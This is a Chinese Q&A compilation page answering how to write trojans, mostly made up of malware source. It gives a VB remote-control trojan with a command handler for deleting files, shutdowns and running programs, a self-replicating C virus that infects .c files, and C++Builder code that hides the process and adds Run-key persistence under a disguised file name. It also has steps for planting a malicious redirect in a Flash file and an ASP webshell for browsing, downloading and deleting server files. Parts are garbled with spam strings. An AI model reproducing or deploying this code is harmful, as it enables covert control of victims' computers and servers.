本文目录一览：

• 1、怎样编写木马程序？我不用，只想知道

• 2、如何来建一个木马程序

• 3、c语言木马源代码

• 4、简单的木马怎么编写啊?

• 5、木马的编程是什么

• 6、木马程序源码

怎样编写木马程序？我不用，只想知道

看看这个，是用VB编的木马程序

1.“特洛伊木马”有被称为BO， 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序，其利用的原理就是：在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端（即被攻击的计算机）的服务器程序，就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。

在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是，在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后，服务器端程序的ConnectionRequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用TreeView控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口；

Case 5

屏蔽开始菜单；

Case 6

按照客户机端传过来的文件名或目录名，而删除它；

Case 7

屏蔽热启动键；

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数，它们用符号“@”隔开。

另外，当客户机端断开与服务器端的来接后，服务器端应用tcpServer_Close事件，来继续准备接收客户机端的请求，其代码如下：

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中 *** ，是修改系统注册表的 *** 。

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中 *** ，是修改系统注册表的 *** 。

成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用BO程序破坏别人的系统。

如何来建一个木马程序

用C++编写的木马程序

DLL在程序编制中可作出巨大贡献，它提供了具共性代码的复用能力。但是，正如一门高深的武学，若被掌握在正义之侠的手上，便可助其仗义江湖；但若被掌握在邪恶之徒的手上，则必然在江湖上掀起腥风血雨。DLL正是一种这样的武学。DLL一旦染上了魔性，就不再是正常的DLL程序，而是DLL木马，一种恶贯满盈的病毒，令特洛伊一夜之间国破家亡。

DLL木马的原理

DLL木马的实现原理是编程者在DLL中包含木马程序代码，随后在目标主机中选择特定目标进程，以某种方式强行指定该进程调用包含木马程序的DLL，最终达到侵袭目标系统的目的。

正是DLL程序自身的特点决定了以这种形式加载木马不仅可行，而且具有良好的隐藏性：

c语言木马源代码

#include stdio.h

#include dir.h

void main(void)

virus();

int virus()

struct ffblk ffblk;

FILE *in,*out,*read;

char *virus="virus.c";

char buf[50][80];

char *p;

char *end="return";

char *bracket="}";

char *main="main";

char *include[2]={"stdio.h","dir.h"};

char *int_virus="int virus()";

char *buffer;

int done,i,j=0,flag=0;

printf("\nI have a virus. Writen by PuBin\n");

done = findfirst("*.c",ffblk,0);

while (!done)

i=0;

if ((in = fopen(ffblk.ff_name, "rt"))== NULL)

goto next;

do{

if(i=50)

fclose(in);

goto next;

p=fgets(buf[i],80,in);

i++;

}while(p!=NULL);

fclose(in);

out=fopen(ffblk.ff_name,"w+t");

fputs("#includestdio.h\n",out);

fputs("#includedir.h\n",out);

do

if(strstr(buf[j],main)!=NULL)

for(;ji-1;j++)

if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)

fputs(buf[j],out);

else

if(flag==0)

flag=1;

fputs("virus();\n",out);

fputs(buf[j],out);

else if((strstr(buf[j],include[0])==NULL)

(strstr(buf[j],include[1])==NULL))

fputs(buf[j],out);

j++;

else

j++;

}while(ji-1);

read=fopen(virus,"rt");

do

p=fgets(buffer,80,read);

if(strstr(buffer,int_virus))

while(p!=NULL)

if(strstr(buffer,virus)==NULL)

fputs(buffer,out);

else

fputs(" char *virus=\"",out);

fputs(ffblk.ff_name,out);

fputs("\";\n",out);

p=fgets(buffer,80,read);

}while(p!=NULL);

fclose(read);

fclose(out);

printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);

next: done = findnext(ffblk);

return 0;

严重声明：这个程序只是供C语言新手参考，开玩笑没关系，但如果用来做不法的事情，本人概不负责。还有，编病毒、木马去做违法的事情惩罚是很重的，你如果想学编程，编个简单的就好了，否则后果很严重。

简单的木马怎么编写啊?

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷， 使在Dos——Windows时代中长大的中国网民从五彩缤纷的 *** 之梦中惊醒，终于认识到的 *** 也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！要知道，木马（Trojan）的历史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要 *** 是诱骗——先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对 *** 可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了 *** 事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的 *** 安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的 *** 协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NM *** TP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和 *** TP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess（）函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：

DWORD dwVersion = GetVersion（）;

// 得到操作系统的版本号

if （dwVersion = 0x80000000）

// 操作系统是Win9x，不是WinNt

typedef DWORD （CALLBACK* LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;

//定义RegisterServiceProcess（）函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary（"KERNEL32"）;

//加载RegisterServiceProcess（）函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = （LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;

//得到RegisterServiceProcess（）函数的地址

lpRegisterServiceProcess（GetCurrentProcessId（）,1）;

//执行RegisterServiceProcess（）函数,隐藏本进程

FreeLibrary（hDLL）;

//卸载动态链接库

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的 *** ，这个留到后面再讲）。

接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

char TempPath[MAX_PATH];

//定义一个变量

GetSystemDirectory（TempPath ,MAX_PATH）;

//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString（TempPath）;

//格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile（ParamStr（0）.c_str（）, AnsiString（SystemPath+"\\Tapi32.exe"）.c_str（） ,FALSE）;

//将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=new TRegistry;

//定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry-RootKey=HKEY_LOCAL_MACHINE;

//设置主键为HKEY_LOCAL_MACHINE

Registry-OpenKey（"Software\\Microsoft\\Windows\\

CurrentVersion\\Run",TRUE）;

//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

//如果以下语句发生异常，跳至catch，以避免程序崩溃

if（Registry-ReadString（"cros *** ow"）!=SystemPath+"\\Tapi32.exe"）

Registry-WriteString（"cros *** ow",SystemPath+"\\Tapi32.exe"）;

//查找是否有“cros *** ow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

//如果不是，就写入以上键值和内容

catch（...）

//如果有错误，什么也不做

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本 *** 协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNM *** TP的25号端口也是 *** TP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

//定义了一堆待会儿要用到的变量

sprintf（TempFile, "%s%2

木马的编程是什么

一、 *** Flas *** 木马的准备 _1@2{3|$^'M!A程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛 Flas *** 木马的原理，是在网页中显示或本地直接播放Flas *** 木马时，让Flash自动打开一个网址，而该网址就是我们预先 *** 好的一个木马网页。也就是说，在 *** 网页木马前，我们首先需要 *** 好一个网页木马，并将它放置到某个网站上去。 %H8H7W*B%N,|:^4i+p6U 另外，我们还需要准备一个比较吸引人的Flas *** 文件“MM热舞.swf”，以及Flas *** 反编译工具“闪客精灵”，编辑工具Macromedia Flash MX。 二、最原始的Flash木马 (X8h4s8G8L"G程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛 现在虽然有了许多各种各样的Flas *** 木马 *** 工具，但是为了了解Flas *** 木马的最基本原理，有必要从头开始用最原始的 *** *** 一个Flash木马。 'h'C(U$R'I1L2v"ttech.techweb.com.cn 步骤一：反编译SWF动画-O7c$^,d"hQ7v5W 首先我们需要将要插入网页木马的Flas *** 文件“MM热舞.swf”，反编译成可编辑的.fla格式。运行“闪客精灵”，点击菜单“文件”→“快速打开”命令，指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令，将动画导出为“MM热舞.fla”文件。 5?-^9_-h)b8F3I,E;m5F 步骤二：插入网页木马代码9t!m*W,{5q%\6j"H!]6n"f 然后运行Flas *** 编辑器Macromedia Flash MX，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/ *** ”项，点击其中的“getURL”命令，在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”，在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W 补充： 步骤三：生成Flash木马 -V"L$o(t8H6m9l)rtech.techweb.com.cn 设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flas *** 木马，可以看到随着Flas *** 打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。 接着~~~~~ 三、简简单单生成Flash木马tech.techweb.com.cn*S0m7p#o5A p7S#C6l2zf9e 程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛-q"R1h8o8j0Z5c 上面插入木马的过程比较麻烦，下面我们介绍一个简单的 *** ，也正是这些简单的工具使得Flash木马在网上随处可见。 6V5n8`!I0R/c6~,e程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+z%m3L'k}6M2` 运行SWF木马插入器，点击界面中的“选择”按钮，浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后，点击“给我插”按钮，程序提示开始插入木马网页。显示成功信息后，关闭程序，用IE打开生成的动画，可以看到自动跳转到木马网页去了。 2v)l8e"^5H9^[#_!l 9{7l#Z+X"J(P @,B 四、Flash木马的利用 9U+p6W;d;D7e+F9Ktech.techweb.com.cn 4W6Z4W1v4V"}4A/D$t._0_7P1o 看到上面的步骤了吧，生成一个Flas *** 木马是不是很简单? 那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中，就可以通过论坛或网站之类的直接利用了。 补充： #Bc)e#c9A%`-w程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+|,K({LG)n:X-j*T 1f6F#k.zj3G

满意请采纳

木马程序源码

一个asp木马：

＜%@ LANGUAGE = VBScript.Encode codepage ="936" %＞

＜%Server.ScriptTimeOut=5000%＞

＜object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"＞＜/object＞

＜object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"＞＜/object＞

＜object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"＞＜/object＞

'on error resume next

dim Data_5xsoft

Class upload_5xsoft

dim objForm,objFile,Version

Public function Form(strForm)

strForm=lcase(strForm)

if not objForm.exists(strForm) then

Form=""

else

Form=objForm(strForm)

end if

end function

Public function File(strFile)

strFile=lcase(strFile)

if not objFile.exists(strFile) then

set File=new FileInfo

else

set File=objFile(strFile)

end if

end function

Private Sub Class_Initialize

dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile

dim iFileSize,sFilePath,sFileType,sFormValue,sFileName

dim iFindStart,iFindEnd

dim iFormStart,iFormEnd,sFormName

Version="HTTP上传程序 Version 2.0"

set objForm=Server.CreateObject("Scripting.Dictionary")

set objFile=Server.CreateObject("Scripting.Dictionary")

if Request.TotalBytes＜1 then Exit Sub

set tStream = Server.CreateObject("adodb.stream")

set Data_5xsoft = Server.CreateObject("adodb.stream")

Data_5xsoft.Type = 1

Data_5xsoft.Mode =3

Data_5xsoft.Open

Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)

Data_5xsoft.Position=0

RequestData =Data_5xsoft.Read

iFormStart = 1

iFormEnd = LenB(RequestData)

vbCrlf = chrB(13) chrB(10)

sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)

iStart = LenB (sStart)

iFormStart=iFormStart+iStart+1

while (iFormStart + 10) ＜ iFormEnd

iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf vbCrlf)+3

tStream.Type = 1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iFormStart

Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sInfo = tStream.ReadText

tStream.Close

iFormStart = InStrB(iInfoEnd,RequestData,sStart)

iFindStart = InStr(22,sInfo,"name=""",1)+6

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))

if InStr (45,sInfo,"filename=""",1) ＞ 0 then

set theFile=new FileInfo

iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileName=getFileName(sFileName)

theFile.FilePath=getFilePath(sFileName)

iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14

iFindEnd = InStr(iFindStart,sInfo,vbCr)

theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileStart =iInfoEnd

theFile.FileSize = iFormStart -iInfoEnd -3

theFile.FormName=sFormName

if not objFile.Exists(sFormName) then

objFile.add sFormName,theFile

end if

else

tStream.Type =1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iInfoEnd

Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sFormValue = tStream.ReadText

tStream.Close

if objForm.Exists(sFormName) then

objForm(sFormName)=objForm(sFormName)", "sFormValue

else

objForm.Add sFormName,sFormValue

end if

end if

iFormStart=iFormStart+iStart+1

wend

RequestData=""

set tStream =nothing

End Sub

Private Sub Class_Terminate

if Request.TotalBytes＞0 then

objForm.RemoveAll

objFile.RemoveAll

set objForm=nothing

set objFile=nothing

Data_5xsoft.Close

set Data_5xsoft =nothing

end if

End Sub

Private function GetFilePath(FullPath)

If FullPath ＜＞ "" Then

GetFilePath = left(FullPath,InStrRev(FullPath, "\"))

Else

GetFilePath = ""

End If

End function

Private function GetFileName(FullPath)

If FullPath ＜＞ "" Then

GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)

Else

GetFileName = ""

End If

End function

End Class

Class FileInfo

dim FormName,FileName,FilePath,FileSize,FileType,FileStart

Private Sub Class_Initialize

FileName = ""

FilePath = ""

FileSize = 0

FileStart= 0

FormName = ""

FileType = ""

End Sub

Public function SaveAs(FullPath)

dim dr,ErrorChar,i

SaveAs=true

if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function

set dr=CreateObject("Adodb.Stream")

dr.Mode=3

dr.Type=1

dr.Open

Data_5xsoft.position=FileStart

Data_5xsoft.copyto dr,FileSize

dr.SaveToFile FullPath,2

dr.Close

set dr=nothing

SaveAs=false

end function

End Class

httpt = Request.ServerVariables("server_name")

rseb=Request.ServerVariables("SCRIPT_NAME")

q=request("q")

if q="" then q=rseb

select case q

case rseb

if Epass(trim(request.form("password")))="q_ux888556" then

response.cookies("password")="7758521"

response.redirect rseb "?q=list.asp"

else %＞

＜html＞

＜head＞

＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞

＜title＞＜%=httpt%＞＜/title＞

＜meta name="GENERATOR" content="Microsoft FrontPage 3.0"＞

＜/head＞

＜body＞

＜%if request.form("password")＜＞"" then

response.write "Password Error!"

end if

＜table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"

bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0"＞

＜tr＞

＜td width="100%" height="31" bgcolor="#000080"＞＜p align="center"＞＜font color="#FFFFFF"＞＜%=httpt%＞＜/font＞＜/td＞

＜/tr＞

＜tr＞

＜td width="100%" height="46"＞＜form method="POST" action="＜%=rseb%＞?q=＜%=rseb%＞"＞

＜div align="center"＞＜center＞＜p＞Enter Password：＜input type="password" name="password"

size="20"

style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset"＞

＜input type="submit" value="OK!LOGIN" name="B1"

style="font-size: 9pt; border: thin outset"＞＜/p＞

＜/center＞＜/div＞

＜/form＞

＜/td＞

＜/tr＞

＜/table＞

＜/body＞

＜/html＞

＜%end if%＞

＜%case "down.asp"

call downloadFile(request("path"))

function downloadFile(strFile)

strFilename = strFile

Response.Buffer = True

Response.Clear

set s = Server.CreateObject("adodb.stream")

s.Open

s.Type = 1

if not oFileSys.FileExists(strFilename) then

Response.Write("＜h1＞Error:＜/h1＞" strFilename " does not exist＜p＞")

Response.End

end if

Set f = oFileSys.GetFile(strFilename)

intFilelength = f.size

s.LoadFromFile(strFilename)

if err then

Response.Write("＜h1＞Error: ＜/h1＞" err.Description "＜p＞")

Response.End

end if

Response.AddHeader "Content-Disposition", "attachment; filename=" f.name

Response.AddHeader "Content-Length", intFilelength

Response.CharSet = "UTF-8"

Response.ContentType = "application/octet-stream"

Response.BinaryWrite s.Read

Response.Flush

s.Close

Set s = Nothing

response.end

End Function

＜%case "list.asp"%＞

urlpath=server.urlencode(path)

if Request.Cookies("password")="7758521" then

dim cpath,lpath

if Request("path")="" then

lpath="/"

else

lpath=Request("path")"/"

end if

if Request("attrib")="true" then

cpath=lpath

attrib="true"

else

cpath=Server.MapPath(lpath)

attrib=""

end if

Sub GetFolder()

dim theFolder,theSubFolders

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theSubFolders=theFolder.SubFolders

Response.write"＜a href='" rseb "?q=list.asppath="Request("oldpath")"attrib="attrib"'＞＜font color='#FF8000'＞■＜/font＞↑＜font color='ff2222'＞回上级目录＜/font＞＜/a＞＜br＞＜script language=vbscript＞"

For Each x In theSubFolders

%＞so "＜%=lpath%＞","＜%=x.Name%＞","＜%=request("path")%＞","＜%=attrib%＞"

Next

%＞＜/script＞＜%

end if

End Sub

Sub GetFile()

dim theFiles

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theFiles=theFolder.Files

Response.write"＜table border='0' width='100%' cellpadding='0'＞＜script language=vbscript＞"

For Each x In theFiles

if Request("attrib")="true" then

showstring=x.Name

else

showstring=x.Name

end if

%＞sf "＜%=showstring%＞","＜%=x.size%＞","＜%=x.type%＞","＜%=x.Attributes%＞","＜%=x.DateLastModified%＞","＜%=lpath%＞","＜%=x.name%＞","＜%=attrib%＞","＜%=x.name%＞"

Next

end if

Response.write"＜/script＞＜/table＞"

End Sub

＜html＞

＜head＞

＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞

＜title＞＜%=httpt%＞＜/title＞

＜style type="text/css"＞

table{ font-family: 宋体; font-size: 9pt }

a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }

a:visited{ color: rgb(128,0,0) }

td { font-size: 9pt}

a { color: #000000; text-decoration: none}

a:hover { text-decoration: underline}

.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}

.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}

.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}

＜/style＞

＜/head＞

＜script language="JavaScript"＞

function crfile(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("＜%=rseb%＞?q=edit.aspattrib=＜%=request("attrib")%＞creat=yespath=＜%=lpath%＞"+ls);}

return false;

function crdir(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("＜%=rseb%＞?q=edir.aspattrib=＜%=request("attrib")%＞op=creatpath=＜%=lpath%＞"+ls);}

return false;

＜/script＞

＜script language="vbscript"＞

sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)

document.write "＜tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""＞＜td width='50%'＞＜font color='#FF8000'＞＜font face=Wingdings＞+＜/font＞＜/font＞＜a href='" urlpath lpath xName "' target='_blank'＞＜strong＞" showstring "＜/strong＞＜/a＞＜/td＞＜td width='20%' align='right'＞" size "字节＜/td＞＜td width='30%'＞＜a href='#' title='类型：" type1 chr(10) "属性：" Attributes chr(10) "时间：" DateLastModified "'＞属性＜/a＞ ＜a href='＜%=rseb%＞?q=edit.asppath=" lpath xName "attrib=" attrib "' target='_blank' ＞＜font color='#FF8000' ＞＜/font＞编辑＜/a＞ ＜a href="chr(34)"javascript: rmdir1('" lpath xName "')"chr(34)"＞＜font color='#FF8000' ＞＜/font＞删除＜/a＞ ＜a href='#' onclick=copyfile('" lpath Name "')＞＜font color='#FF8000' ＞＜/font＞复制＜/a＞ ＜a href='＜%=rseb%＞?q=down.asppath=＜%=cpath%＞\"xName"attrib=" attrib "' target='_blank' ＞＜font color='#FF8000' ＞＜/font＞下载＜/a＞＜/td＞＜/tr＞"

end sub

sub so(lpath,xName,path,attrib)

document.write "＜a href='＜%=rseb%＞?q=list.asppath=" lpath xName "oldpath=" path "attrib=" attrib "'＞└＜font color='#FF8000'＞＜font face=Wingdings＞1＜/font＞＜/font＞ " xName "＜/a＞ ＜a href="chr(34)"javascript: rmdir('" lpath xName "')"chr(34)"＞＜font color='#FF8000' ＞＜/font＞删除＜/a＞＜br＞"

end sub

sub rmdir1(ls)

if confirm("你真的要删除这个文件吗!"Chr(13)Chr(10)"文件为："ls) then

window.open("＜%=rseb%＞?q=edit.asppath=" ls "op=delattrib=＜%=request("attrib")%＞")

end if

end sub

sub rmdir(ls)

if confirm("你真的要删除这个目录吗!"Chr(13)Chr(10)"目录为："ls) then

window.open("＜%=rseb%＞?q=edir.asppath="ls"op=delattrib=＜%=request("attrib")%＞")

end if

end sub

sub copyfile(sfile)

dfile=InputBox("※文件复制※"Chr(13)Chr(10)"源文件：" sfileChr(13)Chr(10)"输入目标文件的文件名:"Chr(13)Chr(10) "[允许带路径,要根据你的当前路径模式]")

dfile=trim(dfile)

attrib="＜%=request("attrib")%＞"

if dfile＜＞"" then

if InStr(dfile,":") or InStr(dfile,"/")=1 then

lp=""

if InStr(dfile,":") and attrib＜＞"true" then

alert "对不起，你在相对路径模式下不能使用绝对路径"Chr(13)Chr(10)"错误路径：["dfile"]"

exit sub

end if

else

lp="＜%=lpath%＞"

end if

window.open("＜%=rseb%＞?q=edit.asppath="+sfile+"op=copyattrib="+attrib+"dpath="+lp+dfile)

else
